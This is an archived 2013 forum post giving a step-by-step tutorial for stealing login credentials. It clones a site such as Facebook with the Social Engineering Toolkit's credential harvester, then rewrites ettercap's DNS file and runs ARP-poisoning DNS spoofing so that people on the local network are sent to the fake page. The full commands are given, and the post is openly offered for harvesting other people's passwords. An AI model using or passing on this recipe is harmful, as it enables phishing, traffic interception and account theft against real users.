PDA

View Full Version : How to get login credintials in no-time!



CpLover
12-29-2013, 07:03 PM
This tutorial is split into two parts. I'll start with the site cloning.

First and foremost, you need to know what your IP address is. So if you don't, go onto ifconfig and find out.

We will be using these tools:
Backtrack 5 terminal (preferably R3)
SET (Social Engineering Toolkit)

Here we go:

1. Open up SET (Social Engineering Toolkit)

2. Type '1' and enter for 'Social-Engineering Attacks'

3. Type '2' and enter for 'Website Attack Vectors'

4. Type '3' and enter for 'Credential Harvester Attack Method'

5. Type '2' and enter for 'Site Cloner'

6. You will be asked for your machine’s internal IP address (eg. 192.168.1.13). Type it in and enter.
(If you don’t know it, open another terminal window and type in “ifconfig” without the quotes. Somewhere around there it should say inet addr: your internal ip here)

7. You will then be asked to enter the URL to clone. Type in 'www.facebook.com' or whatever you want to clone and enter.

You should now have cloned whatever site you typed in, so if you type in your IP address in your URL bar, you should get to your fake website. But who's going to visit your random ip address and then login. Nobody.

Don't worry. There is a solution. It's called DNS Spoofing and basically intercepts your request for a website and acts like the DNS server and gives it.. Your IP.. Devilish

1. Go to the terminal and type

Quote:locate etter.dns

2. You'll get this ->

Quote:/usr/local/share/ettercap/etter.dns

3. Type in

Quote:gedit /usr/local/share/ettercap/etter.dns

4. Remove everything and type in:

Quote:whateversiteuwantredirected.com A *YourInternalIpAddressGoesHere*
http://whateversiteyouwantredirected.com A *YourInternalIpAddressGoesHere*

5. Now in terminal, type in the following to start the dns_spoofing
If you're using a wireless connection, WLAN, type,

Quote:ettercap -Tqi wlan0 -P dns_spoof -M ARP // //

If you're using a wired connection, LAN, type

Quote:ettercap -Tqi eth0 -P dns_spoof -M ARP // //


Now sit back and keep your SET terminal open (don't close the ettercap one either), and watch the login details come in.